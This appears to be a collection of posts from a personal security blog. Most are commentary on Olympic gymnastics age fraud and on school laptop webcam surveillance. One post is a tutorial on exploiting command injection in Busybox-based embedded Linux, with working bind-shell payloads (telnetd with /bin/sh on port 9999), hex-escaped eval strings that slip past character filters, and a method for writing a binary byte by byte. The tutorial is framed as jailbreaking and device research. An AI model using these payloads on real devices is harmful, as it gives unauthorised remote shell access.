Medals Delivered, Questions Unanswered

Timeline, 2008

• September 22nd, 2008 A video is released on this blog showing a translated interview with Olympian Yang Yun. The product of collaboration between myself, a volunteer translator and Heather Lawver, the video is a taped confession of age falsification in the Sydney Olympics; the final exhibit in a string of primary documents clearly demonstrating organized sporting fraud.


• September 24th, 2008 The IOC expands its age falsification investigation to include the Sydney Olympics.

Today, the press is reporting the the result of the IOC's investigation: a medal presentation ceremony to the US Sydney gymnastics squad, bronze medals delivered a decade late.


It's a touching story and one I'm proud to be a part of. As I read the reporting surrounding the event, however, I continue to be perplexed by the version that is being put forward.

FIG [...] investigated whether underage gymnasts competed for China at the 2008 Summer Games in Beijing, but found no evidence of wrongdoing. As they pursued those claims last fall, officials decided to take another look at allegations surrounding the ages of two Chinese gymnasts from Sydney.
- The Washington Post

No evidence of wrongdoing? Certainly voluminous records of wrongdoing were published on this blog. But what did the FIG actually say? Perhaps the Washington Post should read this interview with the president of FIG:

Grandi said it was conceivable that China had cheated in Beijing"
"There was strong circumstantial evidence, certainly, but these investigations are not my job ... I'm not the police or Interpol
- Bruno Grandi, President, FIG

More incredible than the claim that the FIG "found no evidence" is the implicit assertion that the IOC/FIG started investigating on September 24th, 2008, because it was just the right day to start looking into fraud eight years later. I do not believe that the investigation was launched two days after we published the Yang Yun video simply out of coincidence. I will never believe this. To do so means that the risks and sacrifices made by the people within China who worked to leak information to me and other bloggers were meaningless. The truth is clear to anyone who reads this blog's archives and examines the documents presented: state sponsored sporting fraud was committed by the Chinese state in Sydney and in Beijing. The fraud was revealed due to the Chinese state's inability to control the compulsory transparency it forced onto its citizens. And the fraud was ignored due to the inability of the FIG & IOC to engage the expertise necessary to validate electronically obtained documents.

So if it's said nowhere else, let it be said here. To those who risked discovery, imprisonment, and worse to get this information to the world: Thank You. For my part, I did my best to represent you.

If you'd like to read the official Chinese response, try to access this link:
http://www.baidu.com/s?wd=cache:strydehax.blogspot.com
That URL is an attempt to retrieve this blog from the archives of the Chinese search engine Baidu. Visiting the link will result in a forcibly terminated connection via automated Internet censorship; you will simply receive a browser error. And that is the official response.
-stryde.hax

A Flurry of Spycam News

New allegations abound regarding high school teachers spying on students. A drama teacher has now been arrested for hiding a camera in order to catch students undressing. His name was Larry Dibble, and it happened in Ohio, not Pennsylvania. Unfortunately I didn't find out from the news; instead, I found out from my alumni newsletter. As I follow this story I can't help wishing I'd had a chance to help; I think I had an above average shot at digging up the 1995 court case against Dibble in Minnesota. It's important to start out talking about Dibble, though, because I believe that when apologists speak about giving school officials unaccountable surveillance powers, they forget that people like Dibble exist. When we talk about trusting schools with the responsibility to choose when to activate spycams, it's important to understand that people like Dibble will be drawn to those positions of power. It's something I wish Henrico County was thinking about as they continue to deploy jailed laptops equipped with remote observation against their students.

The press is having a field day with the amazing allegations being made by the lawyer behind the PA lawsuit: thousands of pictures, pictures of students in partial states of undress, pictures of students sleeping, email exchanges between school administrators reveling in their powers of observation. What's important to remember about these allegations is that they're still allegations. Perhaps the lawyer is sharing part of the discovery process, or, perhaps the lawyer is trying to keep his case alive in the press. It's hard to say. But I believe it is extremely telling that the judge has issued an order against releasing the spycam photos following the publication at Philly.com of photos of Robbins sleeping, and the first school administrator to be questioned has pleaded the Fifth and refused to answer any questions. Meanwhile the school has apparently redacted its claim that the webcams were only activated 42 times, revising the estimate from 42 to "substantial" (presumably a number more than 42), and are individually notifying the families of children who appeared in laptop webcam photographs.

Maybe the allegations are true, maybe they're not. I will say that right now, the school's defense doesn't pass the smell test. If I was forced to bet, I'd bet that everything in the revised complaint is true. And truth be told, this shouldn't come as a surprise. This is the only logical outcome of distributing jailed devices equipped with surveillance hardware and legal barriers against owner observation.

If you can't see the parallels between this case and 1984 being digitally wiped from millions of jailed ebook readers, if you can't see the connection to criminally enforced consumer lockout using the DMCA, then you're not paying attention. There's a reason Apple is filing legal briefs alleging that jailbreaking is terrorism. Anything that keeps the consumer out of their own devices helps to remove pesky questions like the ones being asked right now in Pennsylvania. Blind, restricted consumers are good for business; free citizens create problems. Many read these arguments and believe that because people are still openly jailbreaking, it doesn't matter if it's illegal. Of course, it's only a problem of scale. The Department of Homeland Security is busy arresting people for breaking into devices they own. The only reason iPhone jailbreakers aren't going to federal prison is that there are more of them than the prison system can handle, a situation we shouldn't expect to last. Don't be fooled; this war is only getting started.

-stryde.hax

Webcam Activation Illegal?

I wanted to briefly mention the great follow-up reporting going on at Philly.com on the Harriton High spycam case. This article contains so much great detail and investigative reporting that to summarize it here wouldn't do it justice; if you're following this case, I encourage you to read the whole thing. I wanted to briefly call out one detail, however. There's been a lot of commentary on this blog to the effect that the school might have been within its legal boundaries when activating webcams remotely for the purpose of theft tracking. Not being a lawyer, I've been hesitant to render a legal opinion. However, I find this quote telling:

Joseph Daly, who retired in 2009 as Lower Merion police superintendent, said he never knew that his department was being furnished with pictures snapped from students' laptops.

"God, no, I don't remember that," he said when told about it. "That's illegal as hell."

Well then. Unless he's been grossly misquoted, I believe we have an expert opinion at last.

-stryde.hax

Where Have All the Hackers Gone?

Recently a high school in Pennsylvania shocked the nation when it became the subject of a lawsuit alleging that webcams in school-issued laptop computers were being remotely activated by school staff, used to snap photos of students in their homes. As a computer security professional I dug into the story with the help of my colleagues, and together we found that the networked webcam capability built into these computers by the school district was absolutely real. Our findings were greeted with surprise and dismay; they have caused a nationwide outcry. The truth is, this shouldn't have been a surprise. America has been on this road for years.

Nearly every wired school district in America uses some form of remote administration software. This software varies in the degree of control that it exerts over student computers. The trend started with web filtering and progressed to allow remote use of student's desktops by teachers. Some advanced schools now allow surreptitious eavesdropping of student's desktops while they are working. Today on the cutting edge of this trend is Harriton High, with thousands of taxpayer purchased laptops issued to children, and school staff armed with the ability to take remote webcam pictures of the students at will. This isn't a revolution, it's just a bump on the ride.

Historian James Bradley writes in FlyBoys about a nation of young men growing up in pre-WWII America tinkering, modifying, and optimizing a new wave of internal combustion powered machines. Bradley talks about the inherent advantage that this generation of tinkers gave America in the coming aerial conflict, where pushing new technology to its limits was the key to a new form of warfare: aerial combat. When it comes to information technology, it's time we ask ourselves: where will we find our next generation of computing tinkers? This problem is only now becoming apparent at a national level. The US Air Force is currently holding Cyber Defense competitions at the high school level, nationwide. The Defense Advanced Research Projects Agency (DARPA) recently released a paper stating that the United States will be “hampered” by its projected dearth of expertise in Internet technologies and information security: “we are steadily losing the engineering talent to project these systems .” As our government begins to identify a critical shortage that has been evident in my industry for years as a national security threat, I believe it is time we asked ourselves: “Where have all the hackers gone?”

The answer is that we've stopped making them. Before building Apple Computer, Jobs & Wozniak hacked the phone system. I grew up hacking the computer they built, the Apple ][. Critical events in my personal and professional development were dependent on my ability to access the core of how computers worked in order to understand them, re-purpose them, and harness them to my will. The Greatest Generation supercharged their Chevys; my generation peeked and poked at the internal memory of our Apple computers. Today's generation is growing up in a new era of “jailed” devices, devices like the laptops at Harriton, which were jailed against any student use except approved applications. To tinker with these computers, students were first required to “jailbreak”, a technical feat which would have given students the freedom to understand their computers and to determine who was remotely activating their webcams. Not surprisingly, jailbreaking carried the threat of stringent penalties from the school. A student locked inside a digital jail of this type could never start down the road of digital proficiency necessary to reach the finish line DARPA is asking for.

Digital jails are not solely the realm of education. Devices like the Amazon Kindle and Apple iPhone are jailed against any unauthorized consumer use, guarded by strict but unproven new federal laws against jailbreaking them. Jailed devices are controlled by a networked authority, be it a company like Apple, a school district, an employer, or a government. Jailed devices teach a different kind of lesson to the people who use them: your camera may be monitored, your books may be deleted, your work process may be watched. And most importantly, your attempts to delve into the mysteries of how the device functions will be punished.

We've reached a fork in the road at Harriton High. As the nation watches, we're pondering the consequences of transforming computing devices from machines that we control into machines which exert control over us. As we give away our freedom to tinker, we give away the chance to raise a generation which will lead the information age. It is now time to decide as consumers, as parents, and as a nation which road we will take into the future. I believe that students cannot learn to protect themselves against Internet threats unless they are taught that the power of the Internet comes with a price tag to be paid in responsibility. The responsibility to learn, understand, and master digital self defense. The responsibility to peer inside the machine in order to master it. In order to take on this responsibility, we need to loosen our grip on the reigns and let our children show us the way.

-stryde.hax

Busybox Command Injection

Linux Inside

The number of Linux-powered devices on the market is exploding. As this CCC paper points out, Linux is finding its way into everything - GPS units, television set tops, phones, routers, the works. That leaves a lot of hacking to be done, and this last month I got to spend some time with Intrepidus jailbreaking and exploiting some embedded devices. One big surprise I encountered was the difficulty of landing even simple command-injection vulnerabilities on embedded Linux.

I can't believe it's not Linux

The big problem with a lot of embedded Linux devices is they're not really running Linux. If you haven't heard of Busybox before, it's the core functionality of Linux condensed into a single multi-call binary. Busybox offers embedded device developers a simple distribution of Linux without the large filesize footprint and complexity of porting a full Linux toolchain to embedded hardware. From a hacker's perspective, an embedded Busybox install can pose some unique challenges, especially if you're throwing your exploit "blind", without the ability to see error messages:

• busybox's ash shell lacks the full functionality of bash and other shells


• busybox's available functionality depends on compile options chosen by the developers, so every device has the potential to pose unique challenges


• busybox's implementation of most commands has slightly different functionality and different command line flags than the corresponding Linux versions


• Standard pipe-redirect callback shells often fail; in fact, I've never gotten a standard two-window "telnet | ash | telnet" shell to work on busybox.

What's Command Injection?

Command injection vulnerabilities are usually some of the simplest exploits to land, requiring no assembly and only a little shell knowledge. They can occur whenever developers use user-supplied data as an argument to a shell command. This can happen in a number of ways, and writing a complete reference on all the ways this type of bug can manifest itself is a large topic; OWASP has a good writeup on programmatic (system call) command injection. This writeup isn't about how injection works; it's about how you can exploit injection on busybox. Here's where things get weird.

busybox sh


BusyBox v1.1.3 Built-in shell (ash)
Enter 'help' for a list of built-in commands.

~ $ ping 127.0.0.1
ping: permission denied. (are you root?)

Busybox isn't quite Linux! If you are attempting to find or exploit a "blind" command injection vuln and the target process is not a superuser process, using ping to "beacon" out to your attack box won't work, because on busybox ping requires superuser privs. Telnet is a better beacon choice, as it is part of the default build process and must be manually removed.

Chaining Commands: Nothing New Here

The basics of adding execution to an input argument don't change much with busybox's shell:

~ $ true;echo Execution
Execution
~ $ false;echo Execution
Execution
~ $ true|echo Execution 
Execution
~ $ false|echo Execution
Execution
~ $ false||echo Execution
Execution
~ $ true&&echo Execution 
Execution
~ $ echo `echo Execution`
Execution
~ $ echo $(echo Execution)
Execution

Getting Access

The absolute easiest way to try to get access to a busybox install via command injection is telnetd. Busybox's telnetd is different: on a normal telnetd install the "-l" flag enables line mode, but on busybox, -l specifies the command to use to challenge the user. That means if you specify the busybox shell, you get a shell without a user/pass prompt:

telnetd -l/bin/sh

That's the shortest possible string that can land a shell on a busybox system. Of course, here's where things get tricky. If telnet is already open, this will fail; it will also fail to bind a priveleged port when run as a non-root user. Finally, if the environment does not contain a valid path value, the command will fail.

/bin/busybox telnetd -l/bin/sh -p9999

The command above will bind a telnet shell to port 9999 without a path value and without running as root. Of course, now things get difficult.

Restrictions

Sample exploit conditions are always easy to land and never have anything annoying in the way like character filters or buffer lengths. The real world is different; exploitation often requires circumventing limitations. As far as length goes, the commands above pretty much cover the shortest possible exploit strings. Character set limitations are a different story. Embedded device character set limitations can be pretty heavy duty, enforced by on-screen-keyboards, security character filters, and other methods. A common limitation is space-bounded copy, generated by a tokenizer which clips a supplied argument to everything up to the first instance of whitespace. Here are some ways to work around these limitations:

~ $ echo -e \\x7c\\x7c\\x2e
||.
~ $ printf \\x7c\\x2e\\x0a
|.

Busybox supports evaluation of slash-escaped characters both using echo and the shell builtin printf. This can be used to encode a lot of the characters that are often stripped. Different execution methods require different levels of escaping. Here are some combinations that work; note that I have included the command "true" to show where a successful system command would lie in the overall exploit.

true|/bin/busybox telnetd -l/bin/sh -p9999
# Character set required: -/

true|eval $(printf telnetd\\x20\\x2dl\\x2fbin\\x2fsh\\x20\\x2dp9999)
# Character set required: $()\ 

true|eval `printf telnetd\\\\x20\\\\x2dl\\\\x2fbin\\\\x2fsh\\\\x20\\\\x2dp9999`
# Character set required: `\

If you're attempting to jailbreak a potential busybox device, and you're fuzzing a net-facing service, the strings above coupled with a good [&& / || / | / ; / $() / ``] regular expression should get you started; just monitor port 9999. If you manage to land on a device with the methods I've listed here, drop me a line and let me know how it went down. If you're determined to drop a binary on the device a few bytes at a time, this should get you started:

eval echo -n $(echo -e -n \\xde\\xad\\xbe\\xef $(printf \\x3e\\x3e\\x2ftmp\\x2fig))

Notes on Other Exploit Methods

There are plenty of ways to get onto a Unix-based system like busybox other than binding a shell, however often embedded devices have unique restrictions. Concatenating a user you control to /etc/passwd can silently fail on a readonly filesystem, a very common occurrence on embedded devices. Concatenating binaries from the shell requires precise knowledge of the architecture target type. And when you're jailbreaking, failure is almost universally silent. Good luck,

-stryde.hax

Schools Systems Weigh Benefits of Child Porn Roulette

To Catch a Thief (Naked?)

The story of remotely activated webcams in school laptop programs appears to be a nationwide phenomenon. The media outcry over Harriton High appears to have completely missed the fact that an even larger 1:1 educational laptop program has been using webcams for theft tracking for years as well. This great survey reporting from Philly.com shows a wide ranging reaction from school officials regarding remote laptop activation, from those that get it, to those who don't, those that are quietly deleting their webcam access, and those who... wait, huh, what?

"I didn't even know a computer has the ability to do that"
- Dan Domenech, Executive Director of the American Association of School Administrators

"We had discussed it, but decided not to touch it with a 10-foot pole. ... What if it accidentally started taking pictures? ... You could have an 11-year-old child who steps out of the shower and is toweling off. You could have child pornography. ... Everything is about risk - the risk of losing a device vs. the disaster that can occur ... I would rather lose a computer than hurt a child."
- Jeff Mao, Maine Department of Education

"the McCracken County, Ky., school district began removing tracking software from laptop computers assigned to high school students. Technicians are deleting software that allows access to Web cams and monitors usage on 2,170 laptops"

"In the Henrico County, Va., public schools, which also have a large laptop program, the remotely operated Web cams are disengaged until a computer is stolen. About 26,000 laptops have been issued to students"

You read that right. Harriton is just the tip of the iceberg. Henrico County has been activating their laptop webcams too, and by their admitted numbers, more often than Harriton High:

"Henrico schools spokesman Mychael Dickerson said yesterday that the system has remotely activated cameras 50 times in the past three years to locate computers stolen from elementary schools. Those computers do not go home with students. Of those, 20 have been recovered. The other cases still are under investigation, he said."

Putting aside the amazingly low success ratio apparently quoted above, this means that yet another school district is opting to take pictures of "We'll Find Out What" when laptops go missing. Or as Jeff Mao so eloquently alludes to, they're playing Child Porn Roulette and betting to win in order to find laptops. Unfortunately the ACLU has waded into the fray, armed with all kinds of crazy ideas like "search warrants" and "wiretaps", acting like a total buzzkill and basically spewing common sense everywhere:

"In May of 2009, NBC12 reported the theft of several laptops from Pinchbeck Elementary School. School officials used the police report number -not a warrant- to activate a camera which clearly revealed the suspect, who was arrested a week later, and eventually pled guilty. Now, the ACLU claims that could be an illegal invasion of one's privacy...even that, of a thief."

My personal favorite part of this article is the reporter's shocked tone at the idea that accused criminals have rights. But it's important to note that a warrant was never issued for this search. And that brings me to a really important question regarding search warrants, and their eventual use in programs like this. How does one fill out a webcam search warrant?

We're Going to Search... Something!

If you take a look at the top of the form, you'll see "Name, Address ... premises to be searched". This has always been a part of search warrant forms. With the way webcam theft tracking works, we'll need a new type of search warrant: Location To Be Determined After Search. When these laptops wake up and retrieve orders to activate their webcams, they can literally be anywhere. They can be in a child's bedroom, in a foreign embassy, in a conference room in the hands of someone who inadvertently purchased a hot laptop off Ebay, in a SCIF, or anywhere else in the world. And so, we will need to be able to write search warrants that are valid anywhere on the planet. Or, just maybe, that's impossible, and the process of having to get a search warrant in the first place will reveal how truly ludicrous this entire scheme really is. For now, that quiet whirring sound is the sound of administrators across the country deleting their webcam folder.

-stryde.hax

---

PostScript: "For this school district to develop police powers in secret and then exercise those powers in secret is problematic and disturbing"
-Lillie Coney, EPIC

FIG Revokes Chinese Gymnastics Medal

I Did My Best

When I meet people in computer security circles or at conferences and I'm identified as Stryde, the Olympic story comes up pretty often, and the comment I seem to get the most is "how did you let them get away with it?" I've never understood this sentiment, the idea that I somehow have more power than a Publish button on Blogger, and I often counter with "Well I was going to launch an airstrike but I reconsidered." Little did I know, the president of the International Gymnastics Federation (FIG), Bruno Grandi, has been using the same joke.

From This interview:
"Grandi said it was conceivable that China had cheated in Beijing"
"There was strong circumstantial evidence, certainly, but these investigations are not my job ... I'm not the police or Interpol. If I find that there was cheating, then I can act." ... "I had everything sent to the IOC and the IOC has carried out its investigations and the figures were the same ... The IOC gave us its findings, and we checked them and there was nothing. When people on the Internet find fake documents, you need to legally prove that these are fake, and that's not my job. I have to respect the documents that the Chinese government gives me. What else should I do - declare war on China?"

Putting aside for a moment the "fake documents" phrase, and assuming for a moment that Grandi does not understand that the documents I linked to were hosted by the Chinese government itself, verifiably, for years, the most important part of that interview is the last phrase. Grandi's process, and the IOC's process, requires them to trust documents that are provided to them by governments. This is a great process for finding athletes that are cheating, and a totally failed process for finding governments that are cheating. What justice system would make the defendant an authority on his own guilt? Only the IOC and the FIG.

As Grandi says, a fact-finding authority with the power to prosecute a government for fraud was never involved. The servers from which the world watched the Chinese government censor the truth in real time were never seized and forensically analyzed. No one was ever caught or prosecuted for deleting any of the primary documents off of Chinese government web servers as age records vanished one by one under our watching eyes. And the reason for this is that the FIG by their own admission are not empowered to question governments. So when we say that the Chinese gymnasts were cleared by the FIG, we need to be very clear about what that actually means: not much.

A Confession Is Not Enough

About a week after the translated Yang Yun video created by myself and Heather Lawver was posted, the FIG re-opened their investigation into Chinese gymnasts competing in the Sydney Olympics. Yesterday, as an alert reader pointed out, the FIG revoked the Bronze medal awarded to Dong Fangxiao in Sydney, due to paper evidence they managed to find of her employment under her real age. The Chinese government immediately responded, claiming "there is no problem in Dong Fangxiao's age." What's interesting is that the FIG did not revoke the medal of Yang Yun, who is seen here confessing on state television to competing under age. It is important to note that for the FIG, a videotaped confession was not sufficient evidence. So, to summarize:

• The FIG is by their own admission not authorized to investigate governments for fraud


• The documents I identified implicate the government as having committed fraud


• The removal of every single linked document from government web servers indicates fraud


• A videotaped confession is considered insufficient proof


• Despite all these limitations, the Chinese have still lost a medal for age falsification

Readers are welcome to examine my archives and what evidence is left and make their own conclusions. I haven't written about this since it happened because I felt it became a sports story and not a technology story, and the technology story I was interested in was becoming lost in the noise. I wanted to talk about document permanence, transparency, and the amazing impact both were having on our culture. Fox News just wanted me to say that someone was cheating. In the end, as the FIG prepares to take a medal back, I will say only this: I stand by the integrity of my findings.

- stryde.hax